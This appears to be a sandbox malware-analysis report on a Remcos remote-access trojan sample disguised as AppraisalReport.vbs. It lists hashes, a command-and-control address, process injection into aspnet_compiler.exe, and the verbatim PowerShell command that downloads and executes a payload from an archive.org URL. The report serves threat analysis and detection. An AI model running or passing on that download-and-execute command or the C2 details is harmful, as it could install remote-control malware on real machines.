remcos | 7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14

General

Target

AppraisalReport.vbs
Size

567B
MD5

d6fa102b90f5763f4b5c3ebc4e9b3b62
SHA1

528bf1948d9b3b263480fb5ec88469bfdc2d3d80
SHA256

7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14
SHA512

f37147d7d8aad300ab65fab796812d803f7148ae4a3e9c84ee82925391b8b9c12018b5b17c7d405c224eefcc0bdefa36b94f2ba18619033b179758ce875bfe64

Score

10^/10

remcos rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601405.us.archive.org/23/items/all_20210422_20210422_1042/ALL.txt

Extracted

Family

remcos

C2

194.5.97.183:8888

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

8 2612 powershell.exe
25 2612 powershell.exe
27 2612 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3872 set thread context of 3832 3872 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

2612 powershell.exe
2612 powershell.exe
2612 powershell.exe
3872 powershell.exe
3872 powershell.exe
3872 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2612 powershell.exe
Token: SeDebugPrivilege 3872 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_compiler.exe

pid process

3832 aspnet_compiler.exe

flow	pid	process
8	2612	powershell.exe
25	2612	powershell.exe
27	2612	powershell.exe

description	pid	process	target process
PID 3872 set thread context of 3832	3872	powershell.exe	aspnet_compiler.exe

pid	process
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe
3872	powershell.exe
3872	powershell.exe
3872	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe

pid	process
3832	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 672 wrote to memory of 2612	672	WScript.exe	powershell.exe
PID 672 wrote to memory of 2612	672	WScript.exe	powershell.exe
PID 2612 wrote to memory of 3872	2612	powershell.exe	powershell.exe
PID 2612 wrote to memory of 3872	2612	powershell.exe	powershell.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe
PID 3872 wrote to memory of 3832	3872	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AppraisalReport.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX(New-Object System.Net.WebClient).Downloadstring('https://ia601405.us.archive.org/23/items/all_20210422_20210422_1042/ALL.txt')
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:3832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\ Microsoft.ps1

MD5
7cd78f462b03f3f279131c758fe9cf82

SHA1
8a89be81536b3e46a50528147ae20bee702b19ab

SHA256
c4be9438f9e6b3af481580c9a30ce86f1b7e9ac1919227cd85e3b0d079477124

SHA512
b262273598ea13163a124ef8062332da6990a9da02137bc4d6ab1acba46f4d080d9600a8347384c676ad93ac11966d38a4a451d29b1dc79d7daff63ad0801803

Download Submit
memory/2612-119-0x00000251C2520000-0x00000251C2521000-memory.dmp

Filesize
4KB

Download
memory/2612-121-0x00000251C2550000-0x00000251C2552000-memory.dmp

Filesize
8KB

Download
memory/2612-122-0x00000251C2553000-0x00000251C2555000-memory.dmp

Filesize
8KB

Download
memory/2612-125-0x00000251C3180000-0x00000251C3181000-memory.dmp

Filesize
4KB

Download
memory/2612-130-0x00000251C2556000-0x00000251C2558000-memory.dmp

Filesize
8KB

Download
memory/2612-114-0x0000000000000000-mapping.dmp

Download
memory/3832-182-0x000000000042EEEF-mapping.dmp

Download
memory/3832-181-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3832-184-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3872-144-0x00000164A6FB3000-0x00000164A6FB5000-memory.dmp

Filesize
8KB

Download
memory/3872-159-0x00000164A7490000-0x00000164A7491000-memory.dmp

Filesize
4KB

Download
memory/3872-143-0x00000164A6FB0000-0x00000164A6FB2000-memory.dmp

Filesize
8KB

Download
memory/3872-176-0x00000164A7310000-0x00000164A7328000-memory.dmp

Filesize
96KB

Download
memory/3872-135-0x0000000000000000-mapping.dmp

Download
memory/3872-183-0x00000164A6FB6000-0x00000164A6FB8000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads